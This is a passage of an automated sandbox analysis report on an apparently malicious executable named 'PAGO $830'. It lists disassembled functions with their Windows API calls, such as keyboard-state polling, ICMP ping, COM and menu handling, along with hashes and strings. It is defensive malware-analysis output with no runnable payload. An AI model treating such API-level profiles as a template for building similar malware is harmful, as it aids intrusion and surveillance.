                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                          • String ID:
                                                          • API String ID: 429561992-0
                                                          • Opcode ID: eed5ba4b2fc30f45c62e75a1a169776908ce62bec9c7b38cbd6fae54cadb8750
                                                          • Instruction ID: 90feed6a6eae4f9741ddfac87cc4d9b497e1fdc91b5a790ba092578ee77985c0
                                                          • Opcode Fuzzy Hash: eed5ba4b2fc30f45c62e75a1a169776908ce62bec9c7b38cbd6fae54cadb8750
                                                          • Instruction Fuzzy Hash: 14C15A716043099FC700DF28C88492BBBE9FF89744F15891DFA899B251D771ED45CB62
                                                          Function 00DE79B4 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32(00000000), ref: 00DE7A11
                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DE7AAD
                                                          • SHGetDesktopFolder.SHELL32(?), ref: 00DE7AC1
                                                          • CoCreateInstance.OLE32(00E0FD24,00000000,00000001,00E36E7C,?), ref: 00DE7B0D
                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DE7B92
                                                          • CoTaskMemFree.OLE32(?,?), ref: 00DE7BEA
                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00DE7C75
                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DE7C98
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00DE7C9F
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00DE7CF4
                                                          • CoUninitialize.OLE32 ref: 00DE7CFA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                          • String ID:
                                                          • API String ID: 2762341140-0
                                                          • Opcode ID: 46eff834128d2ed1befaa893b22effe1c07e8f78d6c5f00433818fb390445858
                                                          • Instruction ID: 0f978a468e901a05fa911a3f8c24d1e20330af84a301661a7061212119c5a9a8
                                                          • Opcode Fuzzy Hash: 46eff834128d2ed1befaa893b22effe1c07e8f78d6c5f00433818fb390445858
                                                          • Instruction Fuzzy Hash: 33C13D75A00145AFCB14DFA5C884DAEBBF9FF48304B1481A9F519EB261D731EE85CB60
                                                          Function 00E05352 Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E05439
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E0544A
                                                          • CharNextW.USER32(00000158), ref: 00E05479
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E054BA
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E054D0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E054E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CharNext
                                                          • String ID:
                                                          • API String ID: 1350042424-0
                                                          • Opcode ID: 8951c0a079cf79c5fbf78d73699b7c76bb2c2e3705b005cd78fe532126874bbc
                                                          • Instruction ID: 104a775ded1af6f66ad90310d2c03035340871e46e833886f13607d415a20707
                                                          • Opcode Fuzzy Hash: 8951c0a079cf79c5fbf78d73699b7c76bb2c2e3705b005cd78fe532126874bbc
                                                          • Instruction Fuzzy Hash: 00618B32900609AFDB208F95CC84AFF7BB8EB05754F10A159F926B62D0C77599C58F61
                                                          Function 00DCF971 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DCF998
                                                          • SafeArrayAllocData.OLEAUT32(?), ref: 00DCF9F1
                                                          • VariantInit.OLEAUT32(?), ref: 00DCFA03
                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCFA23
                                                          • VariantCopy.OLEAUT32(?,?), ref: 00DCFA76
                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCFA8A
                                                          • VariantClear.OLEAUT32(?), ref: 00DCFA9F
                                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00DCFAAC
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFAB5
                                                          • VariantClear.OLEAUT32(?), ref: 00DCFAC7
                                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFAD2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                          • String ID:
                                                          • API String ID: 2706829360-0
                                                          • Opcode ID: ea21b86a291675f1f541ae6c65831377bc0e86508c89198232ae16fd3236b132
                                                          • Instruction ID: 0ff4eca69bb4efa4de845e851ace812785bf670cc0eb2ebd0062436dba35741d
                                                          • Opcode Fuzzy Hash: ea21b86a291675f1f541ae6c65831377bc0e86508c89198232ae16fd3236b132
                                                          • Instruction Fuzzy Hash: A0413135A0021AAFCB04DFA5C854EEDBBB9FF48344F108169E955E7251D731A989CFB0
                                                          Function 00DD9B97 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 00DD9BBF
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00DD9C40
                                                          • GetKeyState.USER32(000000A0), ref: 00DD9C5B
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 00DD9C75
                                                          • GetKeyState.USER32(000000A1), ref: 00DD9C8A
                                                          • GetAsyncKeyState.USER32(00000011), ref: 00DD9CA2
                                                          • GetKeyState.USER32(00000011), ref: 00DD9CB4
                                                          • GetAsyncKeyState.USER32(00000012), ref: 00DD9CCC
                                                          • GetKeyState.USER32(00000012), ref: 00DD9CDE
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00DD9CF6
                                                          • GetKeyState.USER32(0000005B), ref: 00DD9D08
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 253f18007007b00572b39acac15645ecf9d09f8ba798f6127cc826270df3d113
                                                          • Instruction ID: 8b30a8fb609c89d2d9a7c39a36152c6140b27cd75695da9be4305ba6b599a1b8
                                                          • Opcode Fuzzy Hash: 253f18007007b00572b39acac15645ecf9d09f8ba798f6127cc826270df3d113
                                                          • Instruction Fuzzy Hash: 034105246047CA6DFF30876888643A5FEE0AB11344F1C805BD5C6677C2EBA799C8C772
                                                          Function 00DD4179 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 239COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(00E0D0D0,?,?), ref: 00DD4212
                                                            • Part of subcall function 00DD3F58: CharUpperBuffW.USER32(?,?,00000000,00E0D0D0,?,?,00000001,?,?,00DD4286,?,?,?,?,00000000,00E0D0D0), ref: 00DD3FE5
                                                          • _wcslen.LIBCMT ref: 00DD4296
                                                          • _wcslen.LIBCMT ref: 00DD42F0
                                                          • _wcslen.LIBCMT ref: 00DD4337
                                                          • _wcslen.LIBCMT ref: 00DD437B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharForegroundUpperWindow
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 1486467469-1994484594
                                                          • Opcode ID: d08c1ba055bb254f314c90e96dc11b92363d7bfa3d2f3d9945420b64b8c0b269
                                                          • Instruction ID: 55597a72c6b6d98118545cb8523cf9c6ecd6f96d89613d22c1138eff09cf6941
                                                          • Opcode Fuzzy Hash: d08c1ba055bb254f314c90e96dc11b92363d7bfa3d2f3d9945420b64b8c0b269
                                                          • Instruction Fuzzy Hash: 1A81CF32A047029BCB14DF79C89596AB7E1FF95324B54462EE49AD3381EB30ED44CBB1
                                                          Function 00DF0482 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WSAStartup.WSOCK32(00000101,?), ref: 00DF04E3
                                                          • inet_addr.WSOCK32(?), ref: 00DF0543
                                                          • gethostbyname.WSOCK32(?), ref: 00DF054F
                                                          • IcmpCreateFile.IPHLPAPI ref: 00DF055D
                                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF05ED
                                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF060C
                                                          • IcmpCloseHandle.IPHLPAPI(?), ref: 00DF06E0
                                                          • WSACleanup.WSOCK32 ref: 00DF06E6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                          • String ID: Ping
                                                          • API String ID: 1028309954-2246546115
                                                          • Opcode ID: 5164d20c9d033bf67f2b8b8297eee54135e2c9f4ac76b99806087b441b2be8d2
                                                          • Instruction ID: 617145034b5856fa59c2778355a92c19fe34b76507979cd5809e31332b1762af
                                                          • Opcode Fuzzy Hash: 5164d20c9d033bf67f2b8b8297eee54135e2c9f4ac76b99806087b441b2be8d2
                                                          • Instruction Fuzzy Hash: D9918D71604205AFD720DF25C488B26BFE0EF88318F19C5A9E569DB6A2C731EC45CFA1
                                                          Function 00DF8BFA Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharLower
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 707087890-567219261
                                                          • Opcode ID: 14d8cc3cc0826b5e4840421d8b3c50584a76670f9badb9b82071a76386454218
                                                          • Instruction ID: aa5552b60a3e64c5ee232e82b5fe19e4579e9bfca37b56a8c61f7e708090df01
                                                          • Opcode Fuzzy Hash: 14d8cc3cc0826b5e4840421d8b3c50584a76670f9badb9b82071a76386454218
                                                          • Instruction Fuzzy Hash: D051CF31A0011A9FCB14DF6CCC518BDB7A5EF65320B268229E966A72C4EB31DD41E7B1
                                                          Function 00DF3653 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoInitialize.OLE32 ref: 00DF369B
                                                          • CoUninitialize.OLE32 ref: 00DF36A6
                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00E0FB94,?), ref: 00DF3700
                                                          • IIDFromString.OLE32(?,?), ref: 00DF3773
                                                          • VariantInit.OLEAUT32(?), ref: 00DF380B
                                                          • VariantClear.OLEAUT32(?), ref: 00DF385D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                          • API String ID: 636576611-1287834457
                                                          • Opcode ID: abbfed6a4dc5d54a5fc4436d9135bb13349c6edca6dc3ebcd5ad55a312a47a3e
                                                          • Instruction ID: 252a439e6e2ba53ce3d3ee3a258c581fa558cd80c9936405e3fb9a70bf7727ee
                                                          • Opcode Fuzzy Hash: abbfed6a4dc5d54a5fc4436d9135bb13349c6edca6dc3ebcd5ad55a312a47a3e
                                                          • Instruction Fuzzy Hash: 326192B1208305AFD310EF55C849B6ABBE4EF48710F168519FA859B291D770EE48CBB2
                                                          Function 00DD4543 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 160COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen
                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                          • API String ID: 176396367-1994484594
                                                          • Opcode ID: 89629dd56373512d61d1e1a191d2781b4016b1fd165897be07e026a58f492efb
                                                          • Instruction ID: a20d2dede86247dc42ab2b6f68a5d4ce68dd4c9e17c3833597a0b2c658da7b18
                                                          • Opcode Fuzzy Hash: 89629dd56373512d61d1e1a191d2781b4016b1fd165897be07e026a58f492efb
                                                          • Instruction Fuzzy Hash: 1B51FF22B003228B8B248E6D898557B77E1BF95B14B68452AE885A7744FB30DD49C3B0
                                                          Function 00E089F4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                            • Part of subcall function 00D8EA9A: GetCursorPos.USER32(?), ref: 00D8EAAE
                                                            • Part of subcall function 00D8EA9A: ScreenToClient.USER32(?,?), ref: 00D8EACB
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000001), ref: 00D8EB02
                                                            • Part of subcall function 00D8EA9A: GetAsyncKeyState.USER32(00000002), ref: 00D8EB1C
                                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 00E08A5D
                                                          • ImageList_EndDrag.COMCTL32 ref: 00E08A63
                                                          • ReleaseCapture.USER32 ref: 00E08A69
                                                          • SetWindowTextW.USER32(?,00000000), ref: 00E08B04
                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E08B17
                                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 00E08BF1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$p#
                                                          • API String ID: 1924731296-655930031
                                                          • Opcode ID: 63829133f08adf368c70488dd70c05cee594d4396553de1539fe0b070fe3ad5d
                                                          • Instruction ID: 63dc11cff3c7591b22fd797f666186ea50e7397cdeb8d2f125f95c5dc9259308
                                                          • Opcode Fuzzy Hash: 63829133f08adf368c70488dd70c05cee594d4396553de1539fe0b070fe3ad5d
                                                          • Instruction Fuzzy Hash: 8751C074204300AFDB14EF20DC96FAA37E4FB88714F40161DF995672E2DB71A988CB62
                                                          Function 00DE32A6 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00DE32ED
                                                            • Part of subcall function 00D7B606: _wcslen.LIBCMT ref: 00D7B610
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DE330E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LoadString$_wcslen
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 4099089115-3080491070
                                                          • Opcode ID: 6ea0c5123ab6af5953f2c1a79db3fdd1d89af9edd1049c3527e3b7c543320978
                                                          • Instruction ID: 997076cc457bf908485e9a3141fcbe46141945bf1b808b00f9b548d6c6ebd003
                                                          • Opcode Fuzzy Hash: 6ea0c5123ab6af5953f2c1a79db3fdd1d89af9edd1049c3527e3b7c543320978
                                                          • Instruction Fuzzy Hash: 00518872900209AACF15EBE1CD46EEEB778EF14340F548066B509720A2EB756F99DB70
                                                          Function 00DDB4E6 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$BuffCharUpper
                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                          • API String ID: 1256254125-769500911
                                                          • Opcode ID: ee5c81a4ba574229104901a4825b3aa306afcb328452e5b1b8125f6b768db39c
                                                          • Instruction ID: bc98a6abbfd3347142ee31d73c8d79628be6fd8def2bc4f7a4f769a6c73387d9
                                                          • Opcode Fuzzy Hash: ee5c81a4ba574229104901a4825b3aa306afcb328452e5b1b8125f6b768db39c
                                                          • Instruction Fuzzy Hash: 9841D932A00126DACB105F7D88515BE77A5BF617BCB69422BE465DB384EB31CD81C7B0
                                                          Function 00DE52B1 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00DE52BE
                                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DE5334
                                                          • GetLastError.KERNEL32 ref: 00DE533E
                                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00DE53C5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Error$Mode$DiskFreeLastSpace
                                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 90054bd90b1f14c81151babd9d7c6007202b7a59c286d07a77bb02e03b6f9194
                                                          • Instruction ID: 8f1ba385f873d836272fb12c0d48c1eea16b9f4c63e0a0630bf9d3f79a1ec0d5
                                                          • Opcode Fuzzy Hash: 90054bd90b1f14c81151babd9d7c6007202b7a59c286d07a77bb02e03b6f9194
                                                          • Instruction Fuzzy Hash: F931E535A006459FCB10EF6AD884BAEBBB4EF44388F188095E405DB396D7B1DD46CBB0
                                                          Function 00E03B79 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMenu.USER32 ref: 00E03BAC
                                                          • SetMenu.USER32(?,00000000), ref: 00E03BBB
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E03C43
                                                          • IsMenu.USER32(?), ref: 00E03C57
                                                          • CreatePopupMenu.USER32 ref: 00E03C61
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E03C8E
                                                          • DrawMenuBar.USER32 ref: 00E03C96
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
